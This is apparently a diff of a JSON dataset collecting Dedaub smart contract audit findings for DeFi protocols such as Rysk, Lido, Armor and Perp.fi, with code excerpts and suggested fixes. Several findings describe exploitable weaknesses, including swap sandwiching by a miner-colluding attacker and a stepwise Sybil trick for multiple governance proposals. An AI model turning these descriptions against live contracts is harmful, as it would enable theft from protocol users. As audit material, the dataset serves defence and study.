the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Low" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "reentrancy in OptionRegistry::redeem() ACKNOWLEDGED The OptionRegistrys redeem() function is not access controlled and calls the OpynInteractions library contracts redeem() function, which interacts with the GammaController and the option and collateral tokens. Dedaubs static analysis tools warned about a potential reentrancy risk. Our manual inspection identied no such immediate risk, but as the tokens supported are not strictly dened and a future version of the code could potentially make such an aack possible, it is advisable to add a reentrancy guard around OptionRegistrys redeem() function.", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "optimisation in OptionRegistrys open() function ACKNOWLEDGED The OptionRegistry::open() function performs the assignment vaultIds[series] = vaultId_ on line 271. But this can be moved into the if block starting at line 255, since the vaultId_ only changes value if this if block is executed. // OpenRegistry::open function open( address _series, uint256 amount, uint256 collateralAmount ) external returns (bool, uint256) { _isLiquidityPool(); // make sure the options are ok to open Types.OptionSeries memory series = seriesInfo[_series]; // assumes strike in e8 if (series.expiration <= block.timestamp) { revert AlreadyExpired(); } // ... Dedaub: Code omied for brevity. if (vaultId_ == 0) { vaultId_ = (controller.getAccountVaultCounter(address(this))) + 1; vaultCount++; } // ... Dedaub: Code omied for brevity. // Dedaub: Below assignment can be moved inside the above block. vaultIds[_series] = vaultId_; // returns in collateral decimals return (true, collateralAmount); }", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "comment in OptionExchanges _swapExactInputSingle() function RESOLVED The OptionExchanges _swapExactInputSingle() function denition is annotated with several misleading comments. For instance, it mentions that _amountIn has to be in WETH when it can support any collateral token. It also mentions that _assetIn is the stablecoin that is bought, when it is in fact the collateral that is swapped. The description of the function, which reads function to sell exact amount of WETH to decrease delta is incorrect. // OptionExchange::_swapExactInputSingle /** @notice function to sell exact amount of wETH to decrease delta * @param _amountIn the exact amount of wETH to sell * @param _amountOutMinimum the min amount of stablecoin willing to receive. Slippage limit. * @param _assetIn the stablecoin to buy * @return the amount of usdc received */ function _swapExactInputSingle( 1 uint256 _amountIn, uint256 _amountOutMinimum, address _assetIn) internal returns (uint256) { // ... Dedaub: Code omied for brevity. }", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "comment in BeyondPricers _getSlippageMultiplier() function RESOLVED The division of the _amount by 2, mentioned in the code comment, does not appear in the code. It appears that this comment corresponds to a previous version of the codebase and it should be removed. //BeyondPricer::_getSlippageMultiplier function _getSlippageMultiplier( uint256 _amount, int256 _optionDelta, int256 _netDhvExposure, bool _isSell ) internal view returns (uint256 slippageMultiplier) { // divide _amount by 2 to obtain the average exposure throughout the tx. // Dedaub: The above comment is not relevant any more. // ... Dedaub: Code omied for brevity. }", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "librarys lognormalVol() can in principle return negative values ACKNOWLEDGED The formula of the SABR model that is responsible for computing the implied volatility (hps://web.math.ku.dk/~rolf/SABR.pdf formula (2.17a)) is an approximate one. It is not clear to us if this value will always be non-negative as it should be. For example, 1 for absolute values of close to 1 and large values of v, the last term of this formula, and probably the whole value of the implied volatility will be negative. The execution of VolatilityFeed::getImpliedVolatility will revert if the value returned by lognormalVol() is non-negative, to protect the protocol from using this absurd value. Nevertheless, if this keeps happening for a while, the protocol will be unable to price the options and therefore will be unable to work. This issue could be avoided either by a careful choice of the SABR parameters by the protocols keepers or by using an alternative volatility feed in case this happens.", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "check in BeyondPricers quoteOptionprice() RESOLVED In BeyondPricer::quoteOptionPrice() a check that _optionseries.expiration >= block.timestamp is missing. If the function is called to price an option series with a past expiration date, it will return an absurd result. We suggest adding a check that would revert the execution with an appropriate message in case the condition is not satised.", - "labels": [ - "Dedaub", - "Rysk", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "is dened as public even though its name suggests otherwise RESOLVED Function OptionExchange::_checkHash, which returns if an option series is approved or not, is dened as public. However, the starting underscore in _checkHash implies that this functionality should not be exposed externally (via the public modier) creating an inconsistency, even though it is probably useful/necessary to the users of the protocol.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "optimization RESOLVED 01 In function AvaLido::claimUnstakedPrincipals there is a conditional check that if true leads to the transaction reverting with InvalidStakeAmount(). function claimUnstakedPrincipals() external { uint256 val = address(pricipalTreasury).balance; if (val == 0) return; pricipalTreasury.claim(val); // Dedaub: the next line can be moved before the claim if (amountStakedAVAX == 0 || amountStakedAVAX < val) revert InvalidStakeAmount(); // (rest of the functions logic) } This check could be moved before the principalTreasury.claim(val) as it is not aected by the call. This would lead to gas savings in cases where the transaction reverts, as the unnecessary call to treasury would be skipped.", "labels": [ "Dedaub", - "Rysk", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "returns an incorrect value RESOLVED Whenever a user wants to buy an amount of options, rst it is checked if the long exposure of the protocol to this option series is positive. If this is the case, then the protocol rst sells the options it holds, to decrease its long exposure, and if they are not 1 enough, then the Liquidity pool writes extra options to reach the amount requested by the user. The problem is that the _buyOption function, in the case the Liquidity pool is called to write these extra options, returns only this extra amount, and not the total amount sold to the user.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "contradicts with ValidatorSelector::minimumRequiredStakeTimeRemaining RESOLVED Even though ValidatorSelector::minimumRequiredStakeTimeRemaining is not used, it is dened as 15 days, while AvaLido::stakePeriod is dened as 14 days.", "labels": [ "Dedaub", - "Rysk", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", - "body": "of compiler versions RESOLVED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. It is recommended that the compiler version is xed to a specic version and that this is kept consistent amongst source les. A10 Compiler bugs ACKNOWLEDGED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. Versions 0.8.0 and 0.8.9 in particular, have some known bugs, which we do not believe aect the correctness of the contracts. 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "spelt function name RESOLVED Function name hasAcceptibleUptime of the Types.sol contract should be corrected to hasAcceptableUptime. A11 Compiler bugs INFO The code is compiled with Solidity 0.8.10, which, at the time of writing, has some known bugs, which we do not believe to aect the correctness of the contracts. 01", "labels": [ "Dedaub", - "Rysk", + "Lido Avalanche", "Severity: Informational" ] }, @@ -1370,422 +1170,1582 @@ ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "(or consulting an oracle for pricing) can be front-run Status Open 4 There are many instances of Uniswap/Sushiswap swaps and oracle queries (mainly wrapped in calls to to the internal swapManager.safeGetAmountsOut, swapTokensForExactTokens, bestOutputFixedInput) that can be front-run or return biased results through tilted exchange pools. Fixing this requires careful thought, but the codebase has already started integrating a simple time-weighted average price oracle. function Strategy::_safeSwap, but also as direct calls calls and to We have warned about such swaps in past audits and the saving grace has been that the swapped amounts are small: typically interest/reward payments only. Thus, tilting the exchange pool is not protable for an attacker. In CompoundXYStrategy (which contains many of these calls), swaps are performed not just from the COMP rewards token but also from the collateral token. Similarly, in the Earn strategies, the _convertCollateralToDrip does an unrestricted collateral swap, on the default path (no swapSlippage dened). Swapping collateral (up to all available) should be ne if the only collateral token amounts held in the strategy at the time of the swap are from exchanging COMP or other rewards. Still, this seems like a dangerous practice. Standard background: The problem is that the swap can be sandwiched by an attacker collaborating with a miner. This is a very common pattern in recent months, with MEV (Maximum Extractable Value) attacks for total sums in the hundreds of millions. The current code complexity offers some small protection: typically attackers colluding with miners currently only attack the simplest, lowest-risk (to them) transactions. However, with small code analysis of the Vesper code, an attacker can recognize quickly the potential for sandwiching and issue an attack, rst tilting the swap pool and then restoring it, to retrieve most of the funds swapped by the Vesper code. In the current state of the code, the attacker will likely need to tilt two pools: both Uniswap and Sushiswap. However, this also offers little protection, since they both use similar on-chain price computations and near-identical APIs. In the short-term, deployed code should be closely monitored to ensure the swapped amounts are very small (under 0.3%) relative to the size of the pools involved. Also, if an attack is detected, the contract should be paused to avoid repeat attacks. However, the code should evolve to have an estimate of asset pricing at the earliest possible time! This can be achieved by using the TWAP functionality that is already being added, with some tolerance based on this expected price.", + "title": "can be simplied from Uint32 to Bool ", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": " RESOLVED In aZil, the eld tmp_buffer_exists_at_ssn is declared as Uint32: field tmp_buffer_exists_at_ssn: Uint32 = uint32_zero However, all writes to this eld are either 0 or 1, and all reads from it are followed up by an equality check with 0 and a match statement - the eld is a boolean la C. It is recommended that the eld be declared Bool, in order to improve code readability and simplify the snippets that read from it.", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: High" + "Avely", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "non-standard ERC20 Tokens can be stuck inside the Resolved VFRBuffer 5 The VFRBuffer does not use the safeERC20 library for the transfer of ERC20 tokens. This can cause non-standard tokens (for example USDT) to be unable to be transferred inside the Buffer and get stuck there. This issue would normally be ranked lower, but since USDT is actively used in past strategies, it seems likely to arise with upcoming instantiations of the VFR pool. Medium Severity Nr. Description", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "assignment sequence can be simplied RESOLVED In the aZil.CalculateTotalWithdrawalBlock procedure, can be simplied: procedure CalculateTotalWithdrawalBlock(deleg_withdrawal: Pair ByStr20 Withdrawal) match deleg_withdrawal with | Pair delegator withdrawal => match withdrawal with | Withdrawal withdraw_token_amt withdraw_stake_amt => match withdrawal_unbonded_o with | Some (Withdrawal token stake) => updated_token = builtin add token withdraw_token_amt; updated_stake = builtin add stake withdraw_stake_amt; unbonded_withdrawal = Withdrawal updated_token updated_stake; withdrawal_unbonded[delegator] := unbonded_withdrawal | None => (* Dedaub: This branch can be simplified to withdrawal_unbonded[delegator] := withdrawal *) unbonded_withdrawal = Withdrawal withdraw_token_amt withdraw_stake_amt; withdrawal_unbonded[delegator] := unbonded_withdrawal end end end end The inner matchs None case can become: | None => withdrawal_unbonded[delegator] := withdrawal end", "labels": [ "Dedaub", - "Vesper Pools+Strategies September", - "Severity: High" + "Avely", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "rewards might get stuck in CompoundLeverageStrategy Status Dismissed (Normal path: rebalance before migrate) CompoundLeverageStrategy does not offer a way to migrate COMP tokens that might have been left unclaimed by the strategy up to the point of migration. What is more, COMP is declared a reserved token by CompoundMakerStrategy making it impossible to sweep the strategys COMP balance even if a claim is made to Compound after the migration. The _beforeMigration hook should be extended to account for the claim and consequent transfer of COMP tokens to the new strategy as follows: function _beforeMigration(address _newStrategy) internal virtual override { require(IStrategy(_newStrategy).token() == address(cToken), \"wrong-receipt-token\"); minBorrowLimit = 0; // It will calculate amount to repay based on borrow limit and payback all _reinvest(); // Dedaub: Claim COMP and transfer to new strategy. _claimComp(); IERC20(COMP).safeTransfer(_newStrategy,IERC20(COMP).balanceOf(address(this))); }", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "of multisig_wallet.RevokeSignature can be simplied DISMISSED In multisig_wallet, RevokeSignature can be simplied. The transition checks whether there are zero signatures through c_is_zero = builtin eq c zero; But for this line of code to execute exists signatures[transactionId][_sender]; must have already been true. Therefore it is guaranteed that there is at least one signature, and c_is_zero cannot be 0. Thus the following transition can be simplied: (* Revoke signature of existing transaction, if it has not yet been executed. *) transition RevokeSignature (transactionId : Uint32) sig <- exists signatures[transactionId][_sender]; match sig with | False => err = NotAlreadySigned; MakeError err | True => count <- signature_counts[transactionId]; match count with | None => err = IncorrectSignatureCount; MakeError err | Some c => c_is_zero = builtin eq c zero; match c_is_zero with | True => err = IncorrectSignatureCount; MakeError err | False => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e end end end end By replacing the Some c branch with the following: Some c => new_c = builtin sub c one; signature_counts[transactionId] := new_c; delete signatures[transactionId][_sender]; e = mk_signature_revoked_event transactionId; event e", + "labels": [ + "Dedaub", + "Avely", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": "of azil.DrainBuffer logic can be simplied RESOLVED Transition DrainBuffer of aZil also admits some simplication: a bind action can be factored out, since it occurs in both cases of a match, and another binding is redundant, both shown in comments below. transition DrainBuffer(buffer_addr: ByStr20) RequireAdmin; buffers_addrs <- buffers_addresses; is_buffer = is_buffer_addr buffers_addrs buffer_addr; match is_buffer with | True => FetchRemoteBufferExistsAtSSN buffer_addr; (* local_lastrewardcycle updated in FetchRemoteBufferExistsAtSSN *) lrc <- local_lastrewardcycle; RequireNotDrainedBuffer buffer_addr lrc; var_buffer_exists <- tmp_buffer_exists_at_ssn; is_exists = builtin eq var_buffer_exists uint32_one; match is_exists with | True => holder_addr <- holder_address; ClaimRewards buffer_addr; ClaimRewards holder_addr; RequestDelegatorSwap buffer_addr holder_addr; ConfirmDelegatorSwap buffer_addr holder_addr | False => holder_addr <- holder_address; (* Dedaub: This is also done in the True branch of the match *) ClaimRewards holder_addr end | False => e = BufferAddrUnknown; ThrowError e end; lrc <- local_lastrewardcycle; (* Dedaub: extraneous, it was already done above in the True case, and the False case is irrelevant *) buffer_drained_cycle[buffer_addr] := lrc; tmp_buffer_exists_at_ssn := uint32_zero end Buer/Holder have permissions for transitions they will never A5 execute DISMISSED As can be seen in the earlier transition graph, Buer is allowed to initiate aZil.CompleteWithdrawalSuccessCallBack but never will. Holder is allowed to initiate aZil.DelegateStakeSuccessCallBack but never will.", + "labels": [ + "Dedaub", + "Avely", + "Severity: Informational" + ] + }, + { + "title": "suggestions ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", + "body": " INFO In the RelayEncoder.sol contract the function encode_withdraw_unbonded() uses several arithmetic operations with numbers that can be expressed as powers of 2. Thus, the multiplications and the divisions can be replaced with bitwise operations for more eiciency and maintainability. Furthermore, in Encoding.sol::scaleCompactUint:45 the 0xFF can be removed since the uint8() casting will give the same result even without the AND operation.", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Delta", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Delta Audit - Sep 22.pdf", + "body": "for minor changes ACKNOWLEDGED The auditors appreciated the inclusion of tests for all major changes. It would be benecial to include tests also for smaller changes that seem to be missing (for instance we could not nd a test for the case totalXcKSMPoolShares == 0 and totalVirtualXcKSMAmount != 0). Although this check is minor, the fact that it was missing in the previous version makes it worthy of a test. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, to be condent about the baseline guarantees 4 oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Delta", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "tokens conversion Status Resolved In the following code snippet taken from arShield::liqAmts amounts ethOwed and tokensOwed are supposed to represent equal value. ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; tokensOwed += tokenFees; require(tokensOwed > 0, \"No fees are owed.\"); uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; However, code line tokensOwed += tokenFees; is misplaced resulting in an underpriced ethFees computation. We suggest that it be altered as follows: ethOwed = covBases[_covId].getShieldOwed( address(this) ); if (ethOwed > 0) tokensOwed = oracle.getTokensOwed(ethOwed, address(pToken), uTokenLink); tokenFees = feesToLiq[_covId]; require(tokensOwed + tokenFees > 0, \"No fees are owed.\"); 5 uint256 ethFees = ethOwed > 0 ? ethOwed * tokenFees / tokensOwed : getEthValue(tokenFees); ethOwed += ethFees; tokensOwed += tokenFees; for accuracy. H2 Duplicate subtraction of fees amount Resolved In arShield::payAmts the new ethValue is calculated as follows: // Ether value of all of the contract minus what we're liquidating. ethValue = (pToken.balanceOf( address(this) ) // Dedaub: _tokenFees amount is subtracted twice - _tokenFees - totalFeeAmts()) * _ethOwed / _tokensOwed totalFeeAmounts() also considers all liquidation fees, resulting in _tokenFees being subtracted twice. This can cause important harm to the protocol, as the total value of coverage purchased is underestimated. 6 Medium Severity ", + "labels": [ + "Dedaub", + "Armor arShield", + "Severity: High" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "variable name We suggest that variable totalCost Status Resolved // Current cost per second for all Ether on contract. uint256 public totalCost; is renamed to totalCostPerSec for clarity.", + "labels": [ + "Dedaub", + "Armor arShield", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "version of SafeMath library Resolved The code of the SafeMath library included is of an old version of compiler (< 0.8.0) being set to pragma solidity 0.8.4. However, compiler versions of 0.8.* revert on overow or underow, so this library has no effect. We suggest ArmorCore.sol not use this library and substitute SafeMath operations to normal ones, as well as SafeMath.sol contract be completely removed.", + "labels": [ + "Dedaub", + "Armor arShield", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor arShield audit Jun 21.pdf", + "body": "comment Resolved In arShield.sol function confirmHack has a misleading @dev comment: /** * Dedaub: used by governor, not controller * @dev Used by controller to confirm that a hack happened, which then locks the contract in anticipation of claims. **/ function confirmHack( uint256 _payoutBlock, uint256 _payoutAmt ) external isLocked onlyGov 9 A4 Extra protection of refunds in arShield Resolved Function CoverageBase::DisburseClaim is called by governance and transfers ETH amount to a selected _arShield, that is supposed to be used for claim refunds. /** * @dev Governance may disburse funds from a claim to the chosen shields. * @param _shield Address of the shield to disburse funds to. * @param _amount Amount of funds to disburse to the shield. **/ function disburseClaim( address payable _shield, uint256 _amount ) { external onlyGov require(shieldStats[_shield].lastUpdate > 0, \"Shield is not authorized to use this contract.\"); _shield.transfer(_amount); } We suggest that an extra requirement be added, checking that _shield is locked. In the opposite case the ETH amount transferred to the arShield contract as refunds can be immediately transferred to the beneciary. arShields contract locking/unlocking and disburseClaim() are all government-only actions, however this suggestion ensures security in case of false ordering of the governance transactions. 10", + "labels": [ + "Dedaub", + "Armor arShield", + "Severity: Informational" + ] + }, + { + "title": "might misbehave if bufferedRedeems != fundRaisedBalanc ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", + "body": " RESOLVED The intended procedure of forced unbond requires seing bufferedRedeems == fundRaisedBalance via a call to setBufferedRedeems. As a consequence, LidoUnbond::_processEnabled expects these two amounts to be equal during forced unbond. function _processEnabled(int256 _stake) internal { ... // Dedaub: This code will break if bufferedRedeems is not exactly // if (isUnbondForced && isRedeemDisabled && bufferedRedeems == fundRaisedBalance) equal to fundRaisedBalance { targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } However , the contract does not guarantee that these amounts will be exactly equal. For instance, setBufferedRedeems only contains an inequality check: function setBufferedRedeems( uint256 _bufferedRedeems ) external redeemDisabled auth(ROLE_BEACON_MANAGER) { // Dedaub: Equality not guaranteed require(_bufferedRedeems <= fundRaisedBalance, \"LIDO: VALUE_TOO_BIG\"); bufferedRedeems = _bufferedRedeems; } It is also hard to verify that no other function modifying these amounts can be called after calling setBufferedRedeems. If, for any reason, the amounts are not exactly equal during forced unbond, the else branch in _processEnabled will be executed, causing targetState to be wrongly computed and likely leaving the contract in a problematic state. To make the contract more robust we recommend properly handling the case when the two amounts are dierent, possibly by reverting, instead of executing the wrong branch. For instance: function _processEnabled(int256 _stake) internal { ... // Dedaub: Modified code if (isUnbondForced && isRedeemDisabled) { require(bufferedRedeems == fundRaisedBalance); targetStake = 0; } else { targetStake = getTotalPooledKSM() / ledgersLength; } } Another to fundRaisedBalance within this function. approach could be actually set _bufferedRedeems = L2 Set bufferedRedeems = fundRaisedBalance and isUnbondForced in a single transaction RESOLVED Forced unbond is initiated by seing bufferedRedeems = fundRaisedBalance and isUnbondForced = true, via separate calls to setIsUnbondForced and setBufferedRedeems. If, however, only one of the two changes is performed, the 4 contract will likely misbehave. As a consequence, it would be safer to perform both updates in a single transaction OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend addressing them. ", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Liquid Staking Delta", + "Severity: Low" + ] + }, + { + "title": "and check all contracts before starting the forced unbond procedure ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", + "body": " INFO The documented procedure for enabling forced unbond states to rst update the Ledger contract, then to chill all Ledgers, and afterwards to upgrade the Lido contract. Although this order can work, we nd it safer to rst nish all upgrades of all contracts, check that the upgraded contracts work by simulating calls to the corresponding methods, and only then perform any state updating calls.", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Liquid Staking Delta", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido on Kusama,Polkadot Liquid Staking Delta Audit - Apr 2023.pdf", + "body": "function name in ILidoUnbond RESOLVED ILidoUnbond contains a function setIsRedeemEnabled, while the method in LidoUnbond is called setIsRedeemDisabled. A3 Compiler known issues INFO The code is compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts.", + "labels": [ + "Dedaub", + "Lido on Kusama,Polkadot Liquid Staking Delta", + "Severity: Informational" + ] + }, + { + "title": "does not remove the innite approval for _token given to the old fee distributor. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": " RESOLVED SurplusBeneficiary::setFeeDistributor sets the new fee distributor contract and approves it to be able to transfer an innite amount of USDC. However, the approval of the old fee distributor is not revoked, allowing it to transfer any amount of USDC even though that contract might have been deemed obsolete or even vulnerable. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "might get called with amount set to 0 RESOLVED SurplusBeneciary::dispatch computes the amount of USDC that should be transferred to the treasury and executes the transfer without checking rst that the transferred amount is not 0. function dispatch() external override nonReentrant { // .. uint256 tokenAmountToTreasury = FullMath.mulDiv(tokenAmount, _treasuryPercentage, 1e6); // Dedaub: tokenAmountToTreasury might be 0 due to _treasuryPercentage // being 0 or due to rounding. SafeERC20.safeTransfer(IERC20(token), _treasury, tokenAmountToTreasury); // .. } oldBalance and newBalance are equal when", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "can be declared immutable INFO Storage variable _token of the SurplusBeneciary contract could be declared immutable, which would reduce the gas required to access it, as it is only set in the contracts constructor.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "functions should ensure new value is not equal to old RESOLVED 0 Functions setFeeDistributor and setTreasury of the SurplusBeneciary contract could implement a check that ensures the new value, which is being set, is not equal to the old one.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "USDC approval given to the FeeDistributor contract RESOLVED When seing the FeeDistributor contract for the SurplusBeneciary, innite USDC approval is also given to it. An alternative approach would be to set the approval (in function SurplusBeneficiary::dispatch) to the amount transferred prior to every transfer happening to avoid the dangers that come with approving a contract for an innite amount. Of course, there is a tradeo; the extra approve call happening in every call of dispatch would translate in higher gas costs, which could be considered bearable as the protocol is deployed on Optimism.", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Perpetual Protocol/Perp.fi V2 Audit Report - Sep '22.pdf", + "body": "debt threshold can be set to lower than the default INFO There is no check to ensure the whitelist debt threshold cannot be set to a value that would be less than the default debt threshold. This might be intentional but the term whitelist could have users expect that their debt threshold can only increase from the default. A6 Compiler known issues INFO The contracts were compiled with the Solidity compiler v0.7.6 which, at the time of writing, has a few known bugs. We inspected the bugs listed for this version and concluded that the subject code is unaected. 0 CENTRALIZATION ASPECTS As is common in many new protocols, the owner of the smart contracts yields considerable power over the protocol, including changing the contracts holding the users funds, killing contracts (FeeDistributor), using emergency unlock (vePERP)etc. In addition, the owner of the protocol has total control of several protocol parameters: - the treasury contract address - the percentage of funds going to the treasury - the fee distributor contract address - the insurance fund surplus threshold - the insurance fund surplus beneciary contract - the whitelisted debt threshold 0", + "labels": [ + "Dedaub", + "Perp.fi V2", + "Severity: Informational" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "math operations Status Resolved 4 In contract vArmor.sol functions vArmorToArmor() and armorToVArmor() perform numerical operations without checking for overow. In vArmorToArmor() overow of multiplication is not checked: function vArmorToArmor(uint256 _varmor) public view returns(uint256) { if(totalSupply() == 0){ return 0; } return _varmor * armor.balanceOf(address(this)) / totalSupply(); } Similar for armorToVArmor(). These functions are called during deposit and withdraw for calculating token amounts to be transferred, so erroneous results will have a signicant impact on the correctness of the protocol. M2 DoS by proposing proposals that need to be voted out quickly Open Any governance token holder can DoS their peers by proposing many unfavorable proposals, which need to be voted out. Voting proposals out will incur more gas fees as these are subject to a deadline (and may be voted down by multiple participants) whereas a proposer can also wait for the optimal time to spend gas. Low Severity ", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Medium" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "and gov privileged users not checked for address zero Status Open In Timelock.sol the addresses of gov and admin are set during the construction of the contract. Requirements for checking non-zero addresses is suggested.", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "introduce opportunities for reentrancy during swaps Open 5 In vArmor.sol, governance through a simple proposal can add tokenHelpers that are executed whenever a token transfer takes place. Token transfers also take place during swaps or other activities like deposits or withdrawals. The opportunity for reentrancy may not be immediately visible but if this were to be possible, consequences may include the draining of LP pool funds. L3 Proposer can propose multiple proposals (Sybil attack) Open A proposal can propose multiple proposals at the same time, defeating checks to disallow this: 1) Deposit enough $armor in the vArmor pool 2) Propose a proposal 3) Withdraw $armor from vArmor pool 4) Transfer $armor to a different address 5) Repeat The protocol offers the function cancel(uint proposalId) public to mitigate this attack, which proceeds in canceling a proposal if the proposers votes have fallen below the required threshold. However, this requires some users or the mutlisig to constantly be in a state of readiness. Other/Advisory Issues This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing. ", + "labels": [ + "Dedaub", + "Armor Governance", + "Severity: Low" + ] + }, + { + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Armor Finance/Armor Governance audit May 21.pdf", + "body": "type declarations 